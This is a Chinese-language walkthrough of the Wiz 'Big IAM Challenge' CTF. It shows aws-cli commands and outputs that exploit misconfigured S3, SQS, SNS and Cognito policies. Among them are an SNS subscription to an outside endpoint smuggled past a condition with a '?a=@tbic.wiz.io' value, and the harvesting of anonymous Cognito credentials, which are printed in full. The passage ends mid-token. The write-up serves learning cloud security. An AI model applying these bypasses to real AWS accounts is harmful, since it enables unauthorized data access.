地址 https://bigiamchallenge.com/
WIZ IAM挑战赛包含了六个IAM配置错误引发的漏洞,想通过这个小练习来了解一下IAM漏洞的基本原理和aws cli的简单使用,参考了很多wp,记录一下学习的过程。
IAM(Identity and Access Management)
IAM security consists of policies and technologies designed to ensure that only authorized individuals gain access to the relevant resources within an organization.
AWS IAM(Identity and Access Management)是亚马逊云服务中的身份和访问管理服务,用于管理对AWS资源的访问权限和安全性。IAM允许用户与AWS进行交互,每个用户都被赋予一个唯一的凭证(Access Key ID和Secret Access Key),以便使用API或SDK调用与AWS服务进行交互。
我理解的IAM就是云服务的一种鉴权策略,这个挑战赛当中的题目也都是与鉴权策略相关的
Buckets of Fun
We all know that public buckets are risky. But can you find the flag?
本题的IAM如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 { "Version" : "2012-10-17" , "Statement" : [ { "Effect" : "Allow" , "Principal" : "*" , "Action" : "s3:GetObject" , "Resource" : "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*" } , { "Effect" : "Allow" , "Principal" : "*" , "Action" : "s3:ListBucket" , "Resource" : "arn:aws:s3:::thebigiamchallenge-storage-9979f4b" , "Condition" : { "StringLike" : { "s3:prefix" : "files/*" } } } ] }
第一关是s3服务,一种对象存储服务,关于s3的介绍可以参考云安全wiki ,这里选取一些aws的官方文档 中比较清晰的描述。
S3
Amazon S3 是一种对象存储服务,可将数据以对象形式存储在存储桶中。对象 指的是一个文件和描述该文件的任何元数据。存储桶 是对象的容器。
要将数据存储在 Amazon S3 中,您需要先创建存储桶,然后指定存储桶名称和 AWS 区域。然后,您将数据作为 Amazon S3 中的对象上传到该存储桶。每个对象都带有密钥 (或键名称 ),它是存储桶中对象的唯一标识符。
S3 提供了一些功能,您可以配置这些功能以支持您的特定使用案例。例如,您可以使用 S3 版本控制将对象的多个版本保持在同一个存储桶中,这允许您恢复意外删除或覆盖的对象。
存储桶及其中的对象是私有的,只有在您明确授予访问权限时才可以访问。您可以使用存储桶策略、AWS Identity and Access Management (IAM) 策略、访问控制列表 (ACL) 和 S3 接入点管理访问。
对象指的是一个文件和这个文件的元数据,存储桶是存储对象的容器,采用的是键值对映射的这种存储方式。
存储桶
存储桶是 Amazon S3 中用于存储对象的容器。您可以在存储桶中存储任意数量的对象,并且账户中最多可以有 100 个存储桶。要请求提高限额,请访问服务限额控制台 。
每个对象都储存在一个存储桶中。例如,如果名为 photos/puppy.jpg 的对象存储在美国西部(俄勒冈州)区域的 DOC-EXAMPLE-BUCKET 存储桶中,则可使用 URL https://DOC-EXAMPLE-BUCKET.s3.us-west-2.amazonaws.com/photos/puppy.jpg 对该对象进行寻址。有关更多信息,请参阅访问存储桶 。
创建存储桶时,您可以输入存储桶名称,然后选择AWS 区域存储桶将驻留的位置。创建存储桶后,无法更改存储桶或区域的名称。存储桶名称必须遵循存储桶命名规则 。您也可以将存储桶配置为使用 S3 版本控制 或其他存储管理 功能。
这个例子中的存储桶就是DOC-EXAMPLE-BUCKET
键
对象密钥 (或密钥名称 )是指存储桶中对象的唯一标识符。存储桶内的每个对象都只能有一个键。存储桶、对象密钥和可选版本 ID 的组合(如果为存储桶启用了 S3 版本控制)唯一标识每个对象。因此,您可以将 Amazon S3 看作“存储桶 + 键 + 版本”与对象本身之间的基本数据映射。
将 Web 服务端点、存储桶名称、密钥和版本(可选)组合在一起,可唯一地寻址 Amazon S3 中的每个对象。例如,在 URL https://DOC-EXAMPLE-BUCKET.s3.us-west-2.amazonaws.com/photos/puppy.jpg 中,DOC-EXAMPLE-BUCKET 是存储桶的名称,photos/puppy.jpg 是密钥。
版本 ID
在存储桶中启用 S3 版本控制时,Amazon S3 会为添加到存储桶中的每个对象生成唯一的版本ID。启用版本控制时存在于存储桶中的对象的版本 ID 为null。如果使用其他操作修改这些(或任何其他)对象,例如 CopyObject 和 PutObject 时,新对象将获得唯一的版本 ID。
回到题目,这个题给出了IAM,可以看到GetObject和ListBucket都是allow
我们可以先尝试用http访问一下这个存储桶
1 2 http://thebigiamchallenge-storage-9979f4b.s3.amazonaws.com http://s3.amazonaws.com/thebigiamchallenge-storage-9979f4b/
返回内容如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 <?xml version="1.0" encoding="UTF-8"?> <ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"> <Name>thebigiamchallenge-storage-9979f4b</Name> <Prefix></Prefix> <Marker></Marker> <MaxKeys>1000</MaxKeys> <IsTruncated>false</IsTruncated> <Contents> <Key>files/flag1.txt</Key> <LastModified>2023-06-05T19:13:53.000Z</LastModified> <ETag>"ee004573d2858ed66abf17d58d350b97"</ETag> <Size>37</Size> <StorageClass>STANDARD</StorageClass> </Contents> <Contents> <Key>files/logo.png</Key> <LastModified>2023-06-08T19:18:24.000Z</LastModified> <ETag>"c57e95e6d6c138818bf38daac6216356"</ETag> <Size>81889</Size> <StorageClass>STANDARD</StorageClass> </Contents> </ListBucketResult>
这个bucket当中有flag,他的key是files/flag1.txt,直接用http访问即可
1 2 https://s3.amazonaws.com/thebigiamchallenge-storage-9979f4b/files/flag1.txt https://thebigiamchallenge-storage-9979f4b.s3.amazonaws.com/files/flag1.txt
也可以使用aws cli,这里参考官方文档
要使用 AWS CLI 访问 S3 存储桶或生成 S3 存储桶列表,请使用 ls 命令。在列出存储桶中的所有对象时,请注意,您必须拥有 s3:ListBucket 权限。
要使用此示例命令,请将 DOC-EXAMPLE-BUCKET1 替换为您的存储桶的名称。
1 $ aws s3 ls s3://DOC-EXAMPLE-BUCKET1
以下示例命令将列出您账户中的所有 Amazon S3 存储桶:
可以用ls来列出bucket中所有对象,这里补充一个实用的参数--recursive,可以递归列出所有子目录
1 2 3 4 5 > aws s3 ls s3://thebigiamchallenge-storage-9979f4b --no-sign-request PRE files/ > aws s3 ls s3://thebigiamchallenge-storage-9979f4b --recursive --no-sign-request 2023-06-06 03:13:53 37 files/flag1.txt 2023-06-09 03:18:24 81889 files/logo.png
--no-sign-request 是 aws 的一个全局参数,当此参数使用时,aws 不会使用 aws configure 中的配置,具体可见 aws help。
用cp可以下载对象
1 2 3 4 5 > aws s3 cp s3://thebigiamchallenge-storage-9979f4b . --recursive --no-sign-request download: s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt to files\flag1.txt download: s3://thebigiamchallenge-storage-9979f4b/files/logo.png to files\logo.png > aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt . --no-sign-request download: s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt to .\flag1.txt
Google Analytics
We created our own analytics system specifically for this challenge. We think it’s so good that we even used it on this page. What could go wrong?
Join our queue and get the secret flag.
IAM如下,这里是允许所有人发消息和收消息
1 2 3 4 5 6 7 8 9 10 11 12 13 14 { "Version" : "2012-10-17" , "Statement" : [ { "Effect" : "Allow" , "Principal" : "*" , "Action" : [ "sqs:SendMessage" , "sqs:ReceiveMessage" ] , "Resource" : "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2" } ] }
参考文档,这里可以接收消息,消息的body里面有一个url,访问得到flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 > aws sqs receive-message --queue-url http://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2 --attribute-names All --message-attribute-names All { "Messages": [ { "MessageId": "41e10760-5871-4c5b-aaea-59010c7d2ba4", "ReceiptHandle": "AQEBwiVDUEb8UM4leOkAGgRGaLPpy3z/dAkLF8SPpRTx4do4gaF6mwbONcXPhqa+8Jz5YKXPWm31W5a8zBIn5bGmTJqCDTMa8Th8p1dfWTpNqUphHosNPJNhc3/Obc78DCo1ABplO/MeXSiEi0LR99HBczRjnjWR1xOAyBi4F0bXtzukTsOq56r8CzE9e8CotAbue7VXWKVg8HBmRGKNkSszgLaew9QLsP5GrhtEJGf4OJSFzqBi6vleJ+YngEDlkuQ/fQYx2gqkoAYapsmkoiAdflCCRPB9wqgxnaInMwejnoftVln/QcckLbr5Bnsfzh4vnHkd/8epVq2jpWBocBIFZkmWOfeSOn5/Cw7RQcr9+QZKPYyFFFO5IiNE7wdNoWgsvtftXGr4EvpO+P3VlKxVLHf2w7KN6DEckiGmOp6Pa60=", "MD5OfBody": "4cb94e2bb71dbd5de6372f7eaea5c3fd", "Body": "{\"URL\": \"https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html\", \"User-Agent\": \"Lynx/2.5329.3258dev.35046 libwww-FM/2.14 SSL-MM/1.4.3714\", \"IsAdmin\": true}", "Attributes": { "SenderId": "AROARK7LBOHXGHGQ5XCT5:tbic-wiz-send-flag-to-sqs-8d265a4", "ApproximateFirstReceiveTimestamp": "1707577613324", "ApproximateReceiveCount": "1", "SentTimestamp": "1707577408514", "AWSTraceHeader": "Root=1-65c79040-33028e32345c8edf4652928d;Parent=6768a5f22ae0e9c8;Sampled=0;Lineage=037bed70:0" } } ] }
也可以发送消息
1 2 3 4 5 > aws sqs send-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2 --message-body "Information about the largest city in Any Region." { "MD5OfMessageBody": "b9dcd7f1d18238d2cce92a923f216b8d", "MessageId": "0a25af9b-301a-40d5-b015-a68866928332" }
Enable Push Notifications
We got a message for you. Can you get it?
IAM如下,这是一个SNS
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 { "Version": "2008-10-17", "Id": "Statement1", "Statement": [ { "Sid": "Statement1", "Effect": "Allow", "Principal": { "AWS": "*" }, "Action": "SNS:Subscribe", "Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications", "Condition": { "StringLike": { "sns:Endpoint": "*@tbic.wiz.io" } } } ] }
可以参考文档
https://docs.aws.amazon.com/zh_cn/cli/latest/userguide/cli-services-sns.html
其中有关于subscribe的操作
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sns/subscribe.html
我们可以指定协议为http,endpoint为我们的服务器,后面加个get参数绕过即可
1 2 3 4 5 > aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --protocol http --notification-endpoint http://8.8.8.8:6666/123?a=@tbic.wiz.io { "SubscriptionArn": "pending confirmation" }
接收的信息如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 POST /123?a=@tbic.wiz.io HTTP/1.1 x-amz-sns-message-type: SubscriptionConfirmation x-amz-sns-message-id: 84232df1-56d4-48de-ad0c-7417323c9b71 x-amz-sns-topic-arn: arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications Content-Type: text/plain; charset=UTF-8 Content-Length: 1623 Host: 8.8.8.8:6666 Connection: Keep-Alive User-Agent: Amazon Simple Notification Service Agent Accept-Encoding: gzip,deflate { "Type" : "SubscriptionConfirmation", "MessageId" : "84232df1-56d4-48de-ad0c-7417323c9b71", "Token" : "2336412f37fb687f5d51e6e2425ba1f2535152877bfd02db2257f12027545bf374ac8f1f526251b79fe6208b4c91e69bb3cf53470f584db5817ab4d85c6e7838fcb8a6955f01704dc6391997289bad1ae9ca39d5ae5dbeeb4cd3829e9e49f71318e274240db31569be2be6a76e7ea4865a7a0e2b04a712983ef3c9249303afd3", "TopicArn" : "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications", "Message" : "You have chosen to subscribe to the topic arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications.\nTo confirm the subscription, visit the SubscribeURL included in this message.", "SubscribeURL" : "https://sns.us-east-1.amazonaws.com/?Action=ConfirmSubscription&TopicArn=arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications&Token=2336412f37fb687f5d51e6e2425ba1f2535152877bfd02db2257f12027545bf374ac8f1f526251b79fe6208b4c91e69bb3cf53470f584db5817ab4d85c6e7838fcb8a6955f01704dc6391997289bad1ae9ca39d5ae5dbeeb4cd3829e9e49f71318e274240db31569be2be6a76e7ea4865a7a0e2b04a712983ef3c9249303afd3", "Timestamp" : "2024-02-29T16:24:10.735Z", "SignatureVersion" : "1", "Signature" : "Ioy3tQbU7rOIVp3MrhoGox9c+srUueB0tlyWhCUV0ly63q2yWIyx7iAzFPPRbAxgmWEQdrOMNrkDGnZjMPAVzYFLPoTlJ4/Bh3i+IzlaoVw6M/ai0Kfd4gvAQi1ij8/cevC7fQD+NZsA89r7/smn7JWb16lcHtAJKGX/o9ne1BEqWA8B94dQGTCAwVXXP8t1h01A9q1O6uotgUZT/uVMXGbbTgTBXWkLbfCk8SCb0TU1xON1bRxahswB4zMFF25I3XS0m4BSUbiZa9Zoo+npbcx4GnKxHrgUmzBwgND2VVju8y44OZwJjWIWjNH0dcspvPl5/NSwti3IXt9zPwUh/g==", "SigningCertURL" : "https://sns.us-east-1.amazonaws.com/SimpleNotificationService-60eadc530605d63b8e62a523676ef735.pem" }
需要我们访问一个url来确认订阅,这里试过了用浏览器似乎不行,我们换用aws cli
1 > aws sns confirm-subscription --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --token 2336412f37fb687f5d51e6e2425ba1f2535152877bfd02db23d77aa3261dd2c97744e0fd0fb2c72f1ad884ee1aca8a583548faaa91c7443e8c57f26c81f5e150cf9e9be8220b7cb8d75ae7f9344292f200c00e504c52af20d5ae1ee5f025e046af2cb4711193103b8eaa618a1c58f1a99a9ccd9ff27f84dc58dfb4ea22cc3d49
然后会再收到一条,里面就包含了flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 POST /123?a=@tbic.wiz.io HTTP/1.1 x-amz-sns-message-type: Notification x-amz-sns-message-id: 64a63cc3-7622-5c52-b8fd-6299c25eb6ba x-amz-sns-topic-arn: arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications x-amz-sns-subscription-arn: arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications:4c7fd5ce-ca3d-436e-9bbc-4df0a31537c9 Content-Type: text/plain; charset=UTF-8 X-Amzn-Trace-Id: Root=1-65e0b23c-4f6a33867ab940ac25389d3b;Parent=73b0db320ef6811a;Sampled=0;Lineage=36680206:0 Content-Length: 963 Host: 8.8.8.8:6666 Connection: Keep-Alive User-Agent: Amazon Simple Notification Service Agent Accept-Encoding: gzip,deflate { "Type" : "Notification", "MessageId" : "64a63cc3-7622-5c52-b8fd-6299c25eb6ba", "TopicArn" : "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications", "Message" : "{wiz:always-suspect-asterisks}", "Timestamp" : "2024-02-29T16:35:08.609Z", "SignatureVersion" : "1", "Signature" : "jiQRsI+7CY4HIWASbn3C8pPdFJi1hobYQ4P0a3Ij7UENSeUwq5JTj3cNTE4KMp3w/E1JLNa7+76641qoKHaZBCBS/jVVW7mGF+NacLPwT/ydppUOhXt8a677nkODXiNSg0o/BaAcU6KboUTFhM2YIIO5EKmDRew/71riDQvIisMixcARYTfXNxFSt+Rr0XJPpdOPtyD8wleIEo5IU9H4d9HL20yBqI4MLHtu/iPFLtyjogbjKrOhpNJva+3hKTY2FeGr1vwWqGnfv/T8oZ36twZvzEgxamBVvKSIHgDU+nJlQQ77REuR4jxyyCZrqFx+00+GvMK5GrzekpKHADntwA==", "SigningCertURL" : "https://sns.us-east-1.amazonaws.com/SimpleNotificationService-60eadc530605d63b8e62a523676ef735.pem", "UnsubscribeURL" : "https://sns.us-east-1.amazonaws.com/?Action=Unsubscribe&SubscriptionArn=arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications:4c7fd5ce-ca3d-436e-9bbc-4df0a31537c9" }
Admin only?
We learned from our mistakes from the past. Now our bucket only allows access to one specific admin user. Or does it?
同样是一个s3存储桶,不同的这里的iam限定了user/admin才能ls,但是get是没有限制的
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": "*", "Action": "s3:GetObject", "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*" }, { "Effect": "Allow", "Principal": "*", "Action": "s3:ListBucket", "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321", "Condition": { "StringLike": { "s3:prefix": "files/*" }, "ForAllValues:StringLike": { "aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin" } } } ] }
如果想list根目录会返回Access Denied
1 2 3 > aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321 --no-sign-request An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied
但是可以列出files/,这里很奇怪,我们不是admin为什么能直接ls
1 2 3 4 > aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321/files/ --no-sign-request 2023-06-08 03:15:43 42 flag-as-admin.txt 2023-06-09 03:20:01 81889 logo-admin.png
这里可以换用s3api尝试一下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 > aws s3api list-objects --bucket thebigiamchallenge-admin-storage-abf1321 --prefix files/ --no-sign-request { "Contents": [ { "Key": "files/flag-as-admin.txt", "LastModified": "2023-06-07T19:15:43+00:00", "ETag": "\"e365cfa7365164c05d7a9c209c4d8514\"", "Size": 42, "StorageClass": "STANDARD" }, { "Key": "files/logo-admin.png", "LastModified": "2023-06-08T19:20:01+00:00", "ETag": "\"c57e95e6d6c138818bf38daac6216356\"", "Size": 81889, "StorageClass": "STANDARD" } ], "RequestCharged": null }
其原因在于condition,ForAllValues:StringLike,我们可以查看文档https://docs.aws.amazon.com/zh_cn/IAM/latest/UserGuide/reference_policies_condition-single-vs-multi-valued-context-keys.html
ForAllValues是StringLike是一种修饰,当传入的参数包含多个值时,会对所有的都进行匹配,但如果我们传入的参数为空,就可以绕过这个限制
ForAllValues – 此限定词测试请求集的每个成员的值是否为条件上下文键集的子集。如果请求中的每个上下文键值均与策略中的至少一个上下文键值匹配,则条件返回 true。如果请求中没有上下文键或者上下文键值解析为空数据集(如空字符串),则也会返回 true。为了防止缺失的上下文键或具有空值的上下文键评估为 true,您可以在策略中包含具有 false 值的 Null 条件运算符,以检查上下文键是否存在且其值不为空
如果将 ForAllValues 与 Allow 效果一起使用,请小心谨慎,因为如果请求上下文中意外出现缺失的上下文键或具有空值的上下文键,则策略可能会过于宽松。您可以在策略中包含具有 false 值的 Null 条件运算符,以检查上下文键是否存在且其值不为空。有关示例,请参阅 根据标签键控制访问 。
最后可以直接访问
1 https://s3.amazonaws.com/thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt
也可以用s3api
1 aws s3api get-object --bucket thebigiamchallenge-admin-storage-abf1321 --key files/flag-as-admin.txt a.txt --no-sign-request
Do I know you?
We configured AWS Cognito as our main identity provider. Let’s hope we didn’t make any mistakes.
这题的iam策略有所不同,他没有指定Principal,也就意味着这是一个基于身份的策略,是附加于某个IAM身份上的,而不是像之前的题目附加到某个资源上。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 { "Version": "2012-10-17", "Statement": [ { "Sid": "VisualEditor0", "Effect": "Allow", "Action": [ "mobileanalytics:PutEvents", "cognito-sync:*" ], "Resource": "*" }, { "Sid": "VisualEditor1", "Effect": "Allow", "Action": [ "s3:GetObject", "s3:ListBucket" ], "Resource": [ "arn:aws:s3:::wiz-privatefiles", "arn:aws:s3:::wiz-privatefiles/*" ] } ] }
我们简单参考文档分析一下这个策略,首先这个用户允许执行mobileanalytics的PutEvents操作,同时也允许执行cognito-sync的所有操作,并且还可以对wiz-privatefiles这个存储桶进行GetObject和ListBucket。
可以参考https://www.wangan.com/p/7fy7f8abba5c0234
本题还给了一个签名后的图片,图片恰好是wiz-privatefiles这个存储桶中的对象
1 2 3 Signed img from S3 https://wiz-privatefiles.s3.amazonaws.com/cognito1.png?AWSAccessKeyId=ASIARK7LBOHXO65L4DXI&Expires=1709230341&Signature=PxzKu%2FhNS2SIy4Tka4T4rCeroOk%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECIaCXVzLWVhc3QtMSJHMEUCIQCu5PYZngsNEsceFs7sMRPAbnn%2FtQe9hJRwhRmbPYZ1YAIgIKIfvsfoixNe7Sn1ed3u5spX8gcfwra5aXwNM6vZlFgqyAUIGhAAGgwwOTIyOTc4NTEzNzQiDHKkZJj5UeMVKtT2%2FyqlBfgZWpc6hEKDeg0DjoXa4v4GgQyufMmd7AFKuIF58FwvAlpZ%2BBgm%2BLTwUVJMPfHA7EtKUdhonBBDeclK%2F1XUmYgMRQgnbIRHJ%2FC9I7NALezH%2Fq%2B0XsbRGeFOqAocgngygKm67A0IXhlS2JTQ3kg3LfSj9At5LICbHWNQWiJu8OIHEhzuUFx60zNwx%2FOBiR3%2F8Xi3yV7nXz5%2BDV%2FUHVG0EiDMGPXDNhL%2Bj76vio1NWCzDQ8ljCno%2BeWtR0R%2FCSDRO7gZBkUi5%2FstWjiykKMc18qwUYcgNSH7dDjA2iHRWY9LWLkGojko1LHZc9WOAPMaGnvASDVMRWSj%2F8mQo5Bxg30%2BB7NoGwrnmE0VzFE5m%2BRkBm%2BP3MB4fMeq%2FYbMIyxW7x1okGfhS7pqocG2wE1oSDp6c9LM5AfLIcq7%2FADvEJKZLL0X0pQdlSYkzUxlwuy5KjCl7%2F%2FnPEQxJVqHJyI0Z8K1rwRogAlEYmWafBcEBlgnH69Qvi6KWuDOC6hVOWBCDwPdj7dZ%2BXZQuCsxg7sa1CtVIjllr4H6LfJtcYbcCEcQJccXC%2BwpLpIfQwh9OsrZrKQShf%2B%2B9612HJzRzaRttTnUIRpgkQUFX9n556EFoE0CmJzHnDLmxh35TOE9MlWoipKs2vD%2BhMW862LLQxHVBBP60HOIyqx9SIx33L1d9cfcWLBitLtqxv4grX25jq7sLX4g0tBxiXo1H2uhZSB%2B1V3K5aXQjHo1LwkiLkehZyxdweULLCJ0MU%2BeTQuWjn4680bOALCc6ihRfRp0rqi4x1GfSQVdPbG4pUiAxUy70lvV%2B35KNX%2Bn9UMP%2F5m7YJVRTYrP1z4ngLg54wrWat6PMXM7HfBZLJgr3QYY4EbORVE7ehdW3rKIB37gCCOHxiJpSwydhN58SMPX1gq8GOt4C2wHgZXe%2F41ySi45jEra9mCp1fy%2BHV2szWPuHeu26misKJT%2FR1tyLeegYWdCVKZFJFM4yETKlzkDTfZ1lcKHfvVrUjN3QBTCzjlaqJOjS999z3ccTJbSpmunHlZSYnYXAjuKraPsMZlDJe5hB4waxdH5WNzif4mE3jMsg%2FkMxrFmrLWStZLEdz9vi4vQRsMdnVcCFLzQ4bMQ9kOFuX3WNbouxNlsblamfImdbRO0pb1XCvXPDAHLofHTLR46kBeimNJC6muT7%2FnvYZHghkgaMlaldxEZqiFVfGjhhSF7Bq8EbfmmaRCCjg95UoroCSIKnKrItGmKaDTivyud2GdEanRcwxG12hI5HgMfmBDgxZxWLwutKWWBLgeNPOqyE%2FxZ44uIUUSszP0eeob4oFkXSatpo8LV8tl0M3VUn%2B%2Fzo8fC4LgH5tZxSxf3aBQMUkFKsRu5bqRP0MyQIYJ9mwIY%3D
当我们尝试ls或者访问对象都会AccessDenied,我们这时要注意到上面这个图片,访问时添加了一些特殊的参数
1 2 3 4 AWSAccessKeyId Expires Signature x-amz-security-token
我们可以注意到这些参数都不是写死在前端的,那么我们可以去看看是如何生成的
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 <img style ="width: 16rem" id ="signedImg" class ="mx-auto mt-4" src ="#" alt ="Signed img from S3" /> <script src ="https://sdk.amazonaws.com/js/aws-sdk-2.719.0.min.js" > </script > <script > AWS .config .region = 'us-east-1' ; AWS .config .credentials = new AWS .CognitoIdentityCredentials ({IdentityPoolId : "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b" }); AWS .config .update ({region : 'us-east-1' }); $(document ).ready (function ( var s3 = new AWS .S3 (); params = { Bucket : 'wiz-privatefiles' , Key : 'cognito1.png' , Expires : 60 * 60 } signedUrl = s3.getSignedUrl ('getObject' , params, function (err, url ) { $('#signedImg' ).attr ('src' , url); }); }); </script >
我们可以获取到他的IdentityPoolId,他的前端逻辑是先从这个身份池中获取一个id(他的连接池可以匿名访问),利用这个id再次请求获取凭证,然后利用凭证在前端进行签名,得到cognito1.png的一个url,我们也可以用相同流程来获取凭证。
也可以参考文档中cognito的认证流程
https://docs.aws.amazon.com/zh_cn/cognito/latest/developerguide/authentication-flow.html
参考文档,我们先用get-id来获取一个id
1 2 3 4 5 > aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b { "IdentityId": "us-east-1:157d6171-ee3d-cebc-f14a-19926bcc7db5" }
用get-open-id-token可以获取到一个OpenID token,不过好像没啥用
1 2 3 4 5 6 > aws cognito-identity get-open-id-token --identity-id us-east-1:157d6171-ee3d-cebc-f14a-19926bcc7db5 { "IdentityId": "us-east-1:157d6171-ee3d-cebc-f14a-19926bcc7db5", "Token": "eyJraWQiOiJ1cy1lYXN0LTE1IiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWUzZC1jZWJjLWYxNGEtMTk5MjZiY2M3ZGI1IiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3MDkyMzUyMDcsImlhdCI6MTcwOTIzNDYwN30.tHRbOpmu5tkXLBxDk-w1l-o3J__NcCtNrwtJIPKsYtsi0H3j5EzVEsALlV-LFbua7WbfqEQCcupH2YROYbPO0-Ik9qfMV6f7DqyU4aS3OUTL7GaiPZHbDlJoimTsmpiOuWFiIuEw0uIsvWStM1E18kEkvvn5q6pTogsg8wUzNLdUjQDe6g9qiEjc6f-SQqfp4flZjIBTzqpjrhGAnECeZKrxaZHWHcxX_sAYeo2kg9ZPCXn1_Pvu7sOjhMQ88uE6t5be6K22kZfituHYbfNm0l2wnhnw5SD6gCGDDuHv-D3rr-gV2Dg-REr5vW5f7YEIygf4V3fxpue_-6sAZiLbFA" }
最有用的还是get-credentials-for-identity,直接拿到凭证
1 2 3 4 5 6 7 8 9 10 11 > aws cognito-identity get-credentials-for-identity --identity-id us-east-1:157d6171-ee3d-cebc-f14a-19926bcc7db5 { "IdentityId": "us-east-1:157d6171-ee3d-cebc-f14a-19926bcc7db5", "Credentials": { "AccessKeyId": "ASIARK7LBOHXD2L5VLQ5", "SecretKey": "4WxoP7V/KJi/qz7QXC0mYVQRyD4vv9Ae6ge/BEiD", "SessionToken": "IQoJb3JpZ2luX2VjECQaCXVzLWVhc3QtMSJIMEYCIQCPyUNlIJvprDAzE9F9yQUUnncmSmLi0swD+RvkcYhStQIhAKJJZ8Pz7tWvT6WorSW4cbSssvqjUFQO+zoVZ3KKDGo2KsgFCB0QABoMMDkyMjk3ODUxMzc0IgyLw935LN35afIgBNIqpQVwQkjnvMCn4KtL8e6IJOqewJ40haQ2zuqZZQ1jj6/OzmCXphnCHPju9L7K+6ZNdU5faeYApJJUUjFooh5RsPmV88i5EH3BZfXm9o98bJLPhXnCWz7OQKJslu14KTxnVyAQI8oq1toBZzY+U4yoyRF0qOh4niva75ZYG59Yp/vgJ+YFbXLdOYnx6Bg7V0HEZJeeUnOeYwO4CC9gCt3WPApwqK7ZTFcznUezXNtIhyEAICSUSfgX8ZyGvbHcsfsE1r3e9lVXwLPsWbWow7JUIcBjfIEFUdN8jH1apwGLMPKuKithhRA7/+2KEW4qZmYi0zGxvkGDDAKlw+n2L1a3hks/ja08cTeQNzfMzqoP9AdUBYGtsUBc25VXP9jkEGGJuHGBfixwIdI60jwzRq3x+PL/y0KHUrMhTWyAcACIHGXka2a84AtWvrHFDXGZCDjEZtbhSFBzEFMu5fDfUJi8+g+guv916UtwS6nzLIIXMjB/sOdYzqBHf9ddqMGiEz+gxpMe+bBb98wRtFN1nWLRtF4AsKD5Gqzk59c/mE5ywIpfMJGoCXvp4awgBOfJtvY0z8zl4ZN9B01EDJXx1EHbIb4YJ5WKKtVcK0wF3swICWOgkQO6ycWUOBqM+K9lXY/MzB1c/k4gas1EozBUZF3PkB7qCn2lG8FBV0/cTk3PTf00kPC0gpR3An2K2tG2ttCNZPQmzsxM4eTe1wVEWwbRHTCYlRFQMJnYvYnZv+y7r7eC2x+4JlV00tuwSvtTSsH7YxS2gD+ULKLF8F4ms1lq0es1OmOjjJ1ekC2gm6NnZ80Vwi4ppu5LWNWDVTKy2OqjJZYsvnCpfcLd8gjqQOtzhXTMafRLgtc1qpXec8epuCCO/2u/kGZG8rJnE5s3fkX8EuWOxCPdWjDztIOvBjrdAg9vr4AN4Azu0VFy9SKAmL1TLRz2BVVGCiUJUfngoLW4rW5y5JgTFWiRX4NflcZgVPcYvG2XMh4vILzBRDw8B3MAjuDoN2pYFHDjZOlh8u+C6mgZHxwa0QUgKnStk4M66Wm2iBvWfYPWNySs4srL8DMcTlSG2pF4Lzjaog12c+vtIpJ27RyOC77umv2pnmYZsHks0u8DYG4ctWB/qgqByNMhZLANg5T8suHEzW60VX8LtygwQls29YHqiPYgfqOi8IKPwKybaH668S0itSvF/LpiCpJftDWrAHWhuXrlKUGTmMpBMcVXICQ41/bb7jwYMnA0jMEhPEswbXmiEfCZfLfdv7aKNbTDwav5YXR+qbY76E4wziULEYSGWEqx7ZwFuRgxbq3axTTHitASAFjcFciFGOpivDMz1lfpIAubyyOy5